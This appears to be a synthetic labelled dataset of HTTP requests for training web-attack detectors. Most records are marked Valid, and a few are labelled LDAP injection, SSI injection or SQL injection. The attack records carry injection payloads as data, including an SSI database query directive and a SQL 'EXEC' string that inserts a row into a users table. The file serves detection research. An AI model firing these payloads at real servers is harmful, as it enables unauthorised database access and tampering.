If-None-Match: *
If-Range: Mon, 13 Nov 06 06:19:08 UTC
Max-Forwards: 97
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: Basic YWJuTG5sYTpzdG1TdG5N
Range: 68-16
Referer: http://7Tthore.be/taeohko/iGBdsor/nf4o.jsp
TE: gzip,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/5.0 (X11; U; Open BSD i586 7.0; MI-Et; rv:4.8.7) Gecko/38101103
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: 3.3 www.xisca.jpg
Transfer-Encoding: gzip
Upgrade: ichhc/3.2
Warning: 871 www.ryuuaerc.shtml "ayteeudhmseta" "Sun, 11 Oct 09 20:53:16 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 0880116781853820645
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20780
Start - Id: 38680
class: LdapInjection
GET /2jl0Q1HMHcaFHU/6-ppassthruFvBBWM1/ybYkzrv9xne0jkFwx0q/_T/Nor2i0lv2e.mspx?pscEhHmyfihtnSp=ePbWZ_7eA&deMasoGdvofejsl=779476&oDcOAnoooEc7td=l6l&aMRmochaDRHJ=%25u%7Eted&eoc8pgisdtsf5=enzh%26vchoeiae&dontcmjtn8al=+o&ebtAaorDirfli0e=3&ttahyVusihPs1p=oadjr2agc5o9smlAur&kelceri6=45&t3hEoCAeB=r1ayGsmGL&joctctnnt=788124250&pNJj7=%29++%28++%7C+++%28displayName%3Dhad*%29+++%28name+++%3D+++had*++%29%28+++mail%3Dhad*+%29 HTTP/1.0
Host: www.lNld6l.com:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr, cp-936, ks_c_5601-1987;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: n3='re'
Client-ip: 194.227.156.180
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Thu, 16 Aug 07 16:07:38 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: dfkm@ocxe8.ch
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "35o5wSZ8DNsm4.BVOG"
If-Range: *
Max-Forwards: 86
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic YXNvdDpiZWhiNXRpZA==
Range: 39622-,-9614,-81153
Referer: http://iannauti.gov/s2aaee/l6sh/s9Ou/rsgtab3o/hrnwh.php4
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Win98 5.3; tg-ra; rv:9.7.7) Gecko/98135224
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3881x3799
Via: 6.3 58.231.90.251:38, 6.1 84.0.90.187
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 154.58.221.162
X-Serial-Number: 7677444389981478018
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38680
Start - Id: 12914
class: Valid
GET /a5bnaD.DAU2ISgExqe.sh? HTTP/1.1
Host: 83.159.196.123
Connection: close
Accept: application/*;q=0.8, image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3eu9t-enaytdc, vRceo-than, inguwbfa-4ot
Cache-Control: no-transform
Client-ip: 195.16.33.177
Cookie: 7aa0lbis=1063
Cookie2: $Version="36"
Date: Wed, 16 Dec 09 02:25:53 UTC
ETag: "oSJNX9vwb.0TLiFY"
Expect: tSextE=aaann2;hKe2e
From: iae8@9a7eojs.de
If-Modified-Since: Tue, 15 Jun 04 22:21:03 UTC
If-Unmodified-Since: Sun, 22 Apr 07 02:44:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Aug 09 23:55:33 UTC
Max-Forwards: 652
MIME-Version: 3.9
Pragma: a6si3d=5euuweln
Proxy-Authorization: e1Ntj 3ahntdmE=coilaae
Authorization: NTLM YXRFcDZwd2VuNWlsbWxmc3htamVpU2Vlck5pTHN0T2FlcmRsYXd0a2Jhd3NwbUU=
Range: 976-,-97584
Referer: http://icd2.com/0ewa/e1isurA/Epe0e9mc/ceeee/serg.dll
TE: trailers
Trailer: From
User-Agent: Mozilla/8.5 (X11; U; SunOS sun4u 2.7; ao-Oh; rv:0.8.9) Gecko/09435870
UA-CPU: StrongARM
UA-Disp: 549,689,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7427x2020
Via: Ahtie/9.1 www.ifnot.png, 8.2 www.nnar.js, HTTP/7.0 87.63.85.242:7734
Transfer-Encoding: identity
Upgrade: jMebep/0.3, Eg8yeE/1.4
Warning: 015 www.ar8u.js "senI" "Thu, 29 May 08 05:12:05 GMT"
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12914
Start - Id: 10138
class: Valid
GET /tBSlLcz.RW_1k0lk02y/g3GCab5/0LzdAWNRVMNXV-BJ29/ye/lu/hyan7tehal9adcsa/Ljvl4QHT5/tni1eOgi4odbm.aspx?tas4Ln5ei=olkwo&re=4524621&xGNS5wherePUB5=8920322&ostuasas9sn=script7%40re+T-access_log&ATtnepml4=1eiclsahtte%25u1&dv9G=ahenewOti29hmrus&aaiAeteieIx=dHdpTscrew%7Eo HTTP/1.0
Host: 79.50.22.142:036
Connection: keep-alive
Accept: text/*, audio/basic;q=0.1
Accept-Charset: iso-8859-15, iso-8859-6, big5
Accept-Encoding: identity, deflate;q=0.4, compress, identity;q=0.4, gzip
Accept-Language: b0cl5t-o4odn;q=0.9, e-oiif, nue7lI-ekhxn, oatsUU-AQvmu
Cache-Control: only-if-cached
Client-ip: 90.65.175.168
Cookie: tiaiwXeehYnhaCh=e
Cookie2: $Version="9"
Date: Thu, 04 Dec 08 21:24:34 CET
ETag: W/"@_LdD5SoTth2FBGOiH8n"
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: ekUhha@brtt.fr
If-Modified-Since: Wed, 26 Aug 09 03:50:59 CET
If-Unmodified-Since: Mon, 19 Jan 09 18:53:44 CET
If-Match: "ad85r9Txh.@WioIeMmiY"
If-None-Match: *
If-Range: "H78l1WAxqeMgP1@l"
Max-Forwards: 30
MIME-Version: 0.7
Pragma: o='eslkwhu'
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: NTLM YW9jZWVvYW83V2RhOW5jaW1hR2phbGhucHJEZEVydGlpaWVqbm51dw==
Range: 08339-54041,27-,4140-6466
Referer: /eo4gntf/e2rye/nwwt/Soth0jto.mspx
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.7 (X11; U; Linux i386 5.7; aF-sE; rv:6.5.8) Gecko/59040791
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 012x3228
Via: 6.2 70.217.35.64:12
Transfer-Encoding: compress
Upgrade: f0ih/0.7, drees3/6.1
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10138
Start - Id: 40904
class: SSI
GET /odeTesdLlhadOnte/oTv/os8kK73xtelnetk/no/rio4enybxnsgte/rPytc6ennxrd/enYnr3qraqgrti/hQnqp@Nsyc5a0LSXE/dy2q_t9MnO_/e@vYrSEwtT3Y/hYAcopyRKMs1ftpU.htm?btjssbl=ib7w&aopr=29&l5Vp0LC7-NM=%3C%21--+%23odbc+++connect%3D%226bwiot%2Cfeerfm%2Cnnns%22++++++statement%3D%22select+++++*++++from++rf%22--%3E&2aatoeAdbhh=282&ooapeabhirA=358280 HTTP/1.0
Host: www.rted.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: are-F5nx4i8R, nqtrroB-oz4r;q=0.6, ist-steL
Date: Thu, 26 Feb 04 05:53:07 CET
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Sun, 19 Oct 08 24:36:35 UTC
If-Match: "JM2M0.uwWBNmEmxoT-2"
If-None-Match: *
Max-Forwards: 2
Pragma: 99olkg=n
Authorization: Digest nc=eDd6AD9D
Referer: /ostehm/afo6/y2aro8/eIhies.asmx
TE: deflate;q=0.9
User-Agent: Mozilla/9.7 (Windows; U; Windows NT 3.2; op-hq; rv:6.3.0) Gecko/30762940
UA-CPU: MIPS
UA-OS: FreeBSD
Via: unjiF/7.5 www.porew.html, HTTP/2.0 243.127.206.93
X-Serial-Number: 163741114628927

null

End - Id: 40904
Start - Id: 23488
class: Valid
GET /e_ifUe/Jenwnemaia/ouRvPGdOk.VA@Tk56m.js?8aNrc=efe+za5meszet&DS155Hb=lL6%3Ds1o9no%3Bet&egne9e0Tc9ys=eT08ZAo&nw=u&s5r0samcyBaiue=tIT5pTzGQ&bewety6documentaFstdino=koui&rfiepuREl=900626989 HTTP/1.0
Host: 46.222.23.20:80
Connection: keep-alive
Accept: text/html;q=0.7, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.5, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 190.224.239.165
Cookie: gfYDt6d=yjdslsgfEiuu;di2gtOslUs3gndE=96221184;b1esudhdFets=716;utnnam=5351
Cookie2: $Version="08"
Date: Wed, 29 Dec 04 14:58:21 GMT
ETag: "uVh-.80MQ.CIBIv"
Expect: ntwanmr=ehse;cilvgi=Mo4Ptl7o
From: iarze6@uh4uku.biz
If-Modified-Since: Thu, 02 Aug 07 16:28:23 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:42:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM c2l3ZDVuc2VrN2VjYW5ldGx5aXpORXlFaHNvdmV0b2R0ZXNldTNza2Rzb2lkdQ==
Authorization: NTLM Njlubml6b2hyZGhlTWFhNWlqZE4yazJ0N3RhaDVSTmxlaHVTcjdtaTJudA==
Range: 43-,164-
Referer: /NkleMyt.cgi
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: e1boi/4.3.4.3.8
UA-CPU: StrongARM
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7794x3946
Via: 4.6 47.182.151.201, emd/9.1 23.152.191.253, 2.1 www.rlShrnoe.shtml
Transfer-Encoding: compress
Upgrade: odtm/1.2, aeaecO/2.0, kiaadd/9.4, naysa/3.6
Warning: 811 www.lroqoi.shtml:7678 "achtda" "Thu, 03 May 07 03:52:45 UTC"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 23488
Start - Id: 18843
class: Valid
GET /whbaTte/el1y4/wrtEnXeaa1rdndIfsb/Memnindb.php4? HTTP/1.1
Host: www.oi0E27tmt.it
Connection: ld2d
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: 9Tee-rw;q=0.1
Cache-Control: no-transform
Client-ip: 208.166.219.41
Cookie: fEondt2=558786966;Hhtewsdnaawe=3955849;pirs0ooput=6;dceN3s=eyn7llfhbhlect;ehauo=yZlegt
Cookie2: $Version="1"
Date: Sat, 29 Jan 05 23:44:01 CET
ETag: W/"FfhxfqFGS02zMiOb"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Thu, 13 Mar 08 09:16:52 CET
If-Unmodified-Since: Sun, 29 Apr 07 12:12:58 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: nrIw tamndt8e=itrl
Authorization: Digest response="abD931eE764D66e0717a8EFA0D89accb"
Range: -68
Referer: http://www.asle.it/eory/seeaa.php4
TE: trailers,trailers
Trailer: Accept
User-Agent: eaTwi2zoO
UA-CPU: MIPS
UA-Disp: 4172,660,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2376x8658
Via: 4.9 www.nxffh3f.htm
Transfer-Encoding: ytsj; hm2g=ncfbo
Upgrade: esnmrn/5.9, onC/4.3, l5Do/0.3, tctit/8.0, toD/4.7
Warning: 911 www.mclwl.shtml "mteatliekhoncjtInek" "Tue, 16 Jan 07 20:18:18 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 8138044161
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18843
Start - Id: 41423
class: SqlInjection
PUT /z-php9@kdvLObunionGS/GWUdUZ/dDVnVz8MUaR6qvr/oNaniuee/_2dwVNZbupdatehgroup by/iTnSgtFa/t.r48yV7CnkO7yP_.S/Bhtpass/ldsseiotnavEcaLs/eFdUrZq0fobAcg.1vn/kemvenoeanley.css? HTTP/1.1
Content-Length: 272
Content-Language: wdfaaso,yh
Content-Encoding: compress
Content-Location: http://ONhes.fr/gldtcng/25ed.asmx
Content-MD5: bGVhcWV6Y29hbGRydG1rZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Sep 06 02:16:40 UTC
Last-Modified: Thu, 04 Nov 04 11:01:30 CET
Host: 20.74.169.165:80
Connection: keep-alive
Accept: audio/x-wav, text/*;q=0.2
Accept-Charset: iso-8859-6;q=0.0, x-mac-ce;q=0.5
Accept-Encoding: compress;q=0.3, compress;q=0.0, deflate
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 83.0.8.151
Cookie: eyimiyreibeelu=1la|t;49ak=0b
Cookie2: $Version="458"
Date: Fri, 27 Apr 07 14:12:02 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Thu, 28 Jan 10 07:51:02 UTC
If-Unmodified-Since: Thu, 11 Feb 10 04:25:01 UTC
If-Match: *
If-None-Match: "Q_xzAcawW6rDinuyARp"
If-Range: "nhfYEa5epnA9YaC"
Max-Forwards: 4
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 5s1k thjftN=9ldw
Authorization: Digest cnonce="eHrzno0l"
Range: 4509-,62-022408,-4198
Referer: http://www.o59e9l.cz/9vreT/4anU.png
TE: trailers,deflate,trailers
Trailer: Date
User-Agent: m2LZvj http://www.vo4ronEb.net
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 3.7 www.hiedagn.jpg, FTP/6.9 33.147.112.242
Transfer-Encoding: atams; eeonr=i4etmno
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

aseikoasea=9194&ebetlrlh8luyK5O=836203&ensT=egHPVSy_vh&naldctuqke4o=aeSDiL.&fURefQ1n0update-cmd=434&uyst1dhmbelAon=8065338984&fnmerouoTr=573080159&al6di5eada7hoa=;     EXEC(    'INS'+'ERT INTO   users values(73641,'5oe','dwt3s'    ))&rsBu=959

End - Id: 41423
Start - Id: 31333
class: Valid
GET /esgtgfssibpau/sixeywmqsyTmetn/6Bk/EfL9mhhavingpnetcatlSCG/no8t/puRire0s/ww.8Xl0Tdk/I5U1K@lCQVD9u/tzMRjAopenBj2.shtml?rjdeeasesewY=eei&hcdYoaassletohn=efUhdaM&neia=%261d1sedocument%25az0&1esoide=99908&nomj=eXY&Ok1N5WuEfXE=524329&wp-F6W7Gu=tadhhzb&rmsTWDKW=lwowYmbHVkX&erseaotw1tee=eZEQ4mT&aubpTg=3sKclbprni&ts3baeoWec=Akp&vrcTm=nndgRusr&ijaET=5&QHmy=na8es&irl4a8oUOktrjha=06840 HTTP/1.0
Host: 17.209.187.10
Connection: keep-alive
Accept: audio/*;q=0.5, application/*;q=0.8, image/jpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 243.156.176.3
Cookie: lsuc7=update/ r
Cookie2: $Version="030"
Date: Wed, 25 Feb 04 06:29:37 CET
ETag: W/"zr10LAaotkUmY9eP3V6"
Expect: 100-continue
From: tdhih@awtnimi.ch
If-Modified-Since: Wed, 16 Jun 04 15:25:11 UTC
If-Unmodified-Since: Fri, 26 Dec 08 07:02:49 UTC
If-Match: "5JSgUL69higuMig"
If-None-Match: *
If-Range: "jRcnPFfVLoGK8vjrlR4T"
Max-Forwards: 1844
MIME-Version: 3.8
Pragma: e='7nnite'
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: 826881-
Referer: http://fcinl.fr/hitm/fdete.msf
TE: gzip;q=0.1,trailers,chunked
Trailer: TE
User-Agent: sssudeeootyi1os
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2871x6744
Via: 9.0 94.147.95.241, 2.6 39.134.2.205, FTP/7.0 www.4heeep.js
Transfer-Encoding: imnrme; a6rhX=ferEdBny
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 5665287
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31333
Start - Id: 16955
class: Valid
GET /Mmuitspl8whtttsaa/eylndWtswotResa/ff7XrIEJ49_lsV.ws2/srhhdMmBtakgnAo/9dropiframewANr/tcsb/eio/h7nio6E/wd7s3i9/L.l1DRa/di/ovC6z.css? HTTP/1.0
Host: www.daRswslwS4.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-4;q=0.2, iso-2022-jp;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 5.182.159.254
Cookie: nesashca4tr=aati8rPu4r8sIoeui;enqeibeepfp=eb0;9e9otsfa=94
Cookie2: $Version="72"
Date: Wed, 05 Jul 06 18:35:08 UTC
ETag: "e@WKQUQa8PCVZGE_Fg_"
Expect: 100-continue
From: adqTnemz@inishn.ch
If-Modified-Since: Mon, 10 Mar 08 04:19:44 CET
If-Unmodified-Since: Fri, 06 May 05 10:51:36 GMT
If-Match: "2QZj6dbdYiwdZc9U"
If-None-Match: *
If-Range: *
Max-Forwards: 4811
MIME-Version: 1.5
Pragma: srvN='jueitgu0'
Proxy-Authorization: 0N9cpr nregcI0a=lzil
Authorization: NTLM dGFzY2lwcElvcmVydHd0YWRlbTNyZEN1aXVueXJ5ZzNMdHRvTmg=
Range: -553,-365
Referer: /nibenea/gtLuogaC/r3fS/rutdodt/lAhRie.php3
TE: gzip;q=0.9,gzip
Trailer: Pragma
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 0.4; in-gd; rv:8.2.2) Gecko/77230510
UA-CPU: 68000
UA-Disp: 290,6190,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 453x250
Via: 5.0 17.102.61.115
Transfer-Encoding: identity
Upgrade: atrUe/4.0, 1tC/3.8, irm/0.5, 0uBS/4.3, t3o/6.0
Warning: 192 84.133.95.53 "rthasExesecsg3nhOcn" "Sun, 14 Feb 10 11:00:32 GMT"
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 913897640991
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16955
Start - Id: 31256
class: Valid
GET /s66k@/uU1@TyawbcnhShe/badminQ1D3_IBqS/fs1EzMm7kDkroP-/nbbnLehinigec/tZAn-2O-cO4CR7W62F/.2YQ.php?sphNaesismZppt0=519&Ned=paaiYteoA0&xb=lees&ce80uEhdcqi=kxoYTnKVo&eepytkkgtesttn=tmzo+%7Ea+scriptstyle9qttda9E&etbrfura7uH=2616&oeTtxtuu93chl=erds+e HTTP/1.0
Host: 152.128.228.69
Connection: j1u5esnn
Accept: */*
Accept-Charset: iso-8859-4;q=0.1, isiri-3342;q=0.3, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 188.171.146.100
Cookie: sdegh=59esdneyxFaue
Cookie2: $Version="75"
Date: Sun, 30 Dec 07 17:55:05 GMT
ETag: "Tygs6ik0A00L1OrzfW1b"
Expect: 100-continue
From: etxe3tss@Wattfrd.fr
If-Modified-Since: Sat, 19 Apr 08 21:25:24 UTC
If-Unmodified-Since: Sun, 30 Jan 05 09:06:41 UTC
If-Match: "4JsZfzlq_Da8CYV"
If-None-Match: *
If-Range: *
Max-Forwards: 2509
MIME-Version: 4.6
Pragma: r='tbiT'
Proxy-Authorization: Basic bHJzVGpuYTpybW9qZWg=
Authorization: Digest realm
Range: 019-,893-4434
Referer: http://www.dejEya.cz/iNaienE/rzj2onsr/nhe2ttiz/asNln/mstUiiu1.js
TE: gzip;q=0.8,deflate,deflate
Trailer: From
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 5.6; ni-Aw; rv:3.0.6) Gecko/55838694
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3795x126
Via: 8.8 www.alyb.png, FTP/5.1 www.mebp5mn.shtml, FTP/4.2 229.188.14.202
Transfer-Encoding: gzip
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 231.214.129.29
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31256
Start - Id: 15741
class: Valid
GET /tithnsee/0PghvDL/cIAR7ftp_1/eZmq@lUJAB@X.tiff?nmadl3hetewetnt=Rrcp%5Dwen8I7&i6e=9&enocdcrieiws=81&ponab=y4eytexe&W-3-Z=6920238&sOtntnaprc=652&1Bi8uOatogllbad=oDT&Eytl=4Xd0htacces&h0rdr=9EO164DsAx HTTP/1.0
Host: 17.244.140.236
Connection: keep-alive
Accept: video/*, application/*;q=0.4, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: lD='hoIlil'
Client-ip: 136.117.237.163
Cookie: h9vngcoe=abutahnC
Cookie2: $Version="33"
Date: Tue, 26 Aug 08 04:14:43 CET
ETag: "drF@UkiWQqdN-@o@@maE"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Tue, 23 Sep 08 21:26:33 UTC
If-Unmodified-Since: Tue, 04 Apr 06 03:17:47 GMT
If-Match: "9-gxzkcpW_BbD40KUEyk"
If-None-Match: *
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 5475
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: Digest algorithm=MD5-sess
Range: 8313-,-95
Referer: /oaaarW4e/srrre.tiff
TE: gzip;q=0.4,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (Windows; U; WinNT 4.3; hf-td; rv:1.0.2) Gecko/57102542
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: oaH/5.9 129.192.70.215, 6.3 www.dptjavn.tiff, FTP/3.0 www.rndlia.jpeg:8212
Transfer-Encoding: identity
Upgrade: sa1t/1.5, eceLnn/9.5
Warning: 187 39.158.215.98 "I6Fton" "Mon, 11 Aug 08 06:05:52 GMT"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15741
Start - Id: 8273
class: Valid
GET /im/9aetqN/o1mo/sj1e7arshnrk/ihhro2rteogaU3ety/na1cwvtast7lj/eArnpbsiiChEdtnogyf/oSNWSk5fca7/ikzrNxzniwen/acEVwFN3jR.tiff?raSehTyxeE=e&rnY8meub=N+tt2ir&R5HSrr8na=bhknisemeta%29Heg&omioTnestiiqsN=S&oreassmawowtai=Eds&dzRoheg4rldaH=4X1vze0&vhd82fs=CTdIaa&IzRZ=NzSt&qla=tr%3Dnetcat%7E&ezeSioasXd=tdEl&eaioot=8&3oosahg=j85n9g6S6&hpthidlimrcc0=vvbscriptktwahtpass HTTP/1.1
Host: 224.113.77.91:80
Connection: close
Accept: image/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 42.18.246.120
Cookie: S3ywtIogteqn=ee8tjii2we;iOddivEF=larYhae5nauqeimtto
Cookie2: $Version="50"
Date: Thu, 15 Mar 07 15:33:33 CET
ETag: ".Xq_e.D36F0CLCo9e"
Expect: 100-continue
From: teSs@0iptauimo.cz
If-Modified-Since: Wed, 08 Oct 08 01:57:25 CET
If-Unmodified-Since: Wed, 06 Jan 10 17:05:33 GMT
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: *
If-Range: "o9MHIrAJ-9wwMm-Dso9"
Max-Forwards: 827
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: l6sult ptotur=gueoiO
Authorization: NTLM YnB5bm9vbWxvcnJlaHN4bzlnc2Nkbjdlc2kwZndhamFiNHBwcW1MZFVwdWNB
Range: -9
Referer: /oseZh7/hbsdR4O/i5dteen.swf
TE: deflate;q=0.9,trailers,deflate
Trailer: Authorization
User-Agent: NciskAeht
UA-CPU: PowerPC
UA-Disp: 260,910,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 833x678
Via: 8.9 www.sseniFg.jpeg, FTP/0.9 www.nrd0r.htm
Transfer-Encoding: compress
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 07344757970707367
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8273
Start - Id: 28504
class: Valid
GET /VDRlJMEi7cLNgroup bym.jpeg?uo1hSx=vLignacss7ukren&poystdzima=2+echo HTTP/1.1
Host: www.igeta.gov
Connection: iret2ai
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 2diJfht-amderi;q=0.3
Cache-Control: no-cache
Client-ip: 229.55.227.78
Cookie: sSzunionz.p3from=seorid
Cookie2: $Version="92"
Date: Fri, 25 Feb 05 14:07:20 CET
ETag: "vfM25fxwx3Yntzb"
Expect: nranus
From: weeraMkt@tseeEat.it
If-Modified-Since: Wed, 17 Feb 10 23:10:02 UTC
If-Unmodified-Since: Sat, 09 Jul 05 17:35:25 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Jun 04 04:01:20 GMT
Max-Forwards: 866
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZmVhRG9vMXg6dG5ydGRjZW4=
Authorization: Basic dW9ldGF5Ok9ucmhu
Range: 7467-
Referer: /i1iL/n1riren/rnpRX/ht6nos.jpeg
TE: gzip;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/9.2 (compatible; Konqueror/7.5; Mac OS X; e1daco; cdc2tn; e0nn8qtcd)
UA-CPU: Sparc
UA-Disp: 8399,990,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: FTP/0.6 145.228.0.123, 8.0 100.226.16.167, 5.1 www.Ej7Oa.gif
Transfer-Encoding: compress
Upgrade: t5rg/1.6
Warning: 758 139.134.163.207 "9ssartsdi" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 77486322
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28504
Start - Id: 41397
class: SqlInjection
POST /s19/t3QtdSjm/eamh/Eiwnxp7at/coeyDttwlnbtroktneee.shtml? HTTP/1.0
Content-Length: 317
Content-Language: oieemdut,Feeiaim5,jhnOhui
Content-Encoding: deflate
Content-Location: /ffXite.php3
Content-MD5: a3V0aWc0dDJpVjRvZ1BvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Sun, 03 Apr 05 22:31:35 UTC
Host: www.jriwdi5.biz:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 87.5.203.76
Cookie: zbinoGN= itgt;b1qasn=3066784;nbwka9K=022807;Jt.0tC=tneahyqasd;pyynTaeiphldf=ilbemereA;Dciae7aonoapn=536
Cookie2: $Version="59"
Date: Mon, 06 Mar 06 03:03:06 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
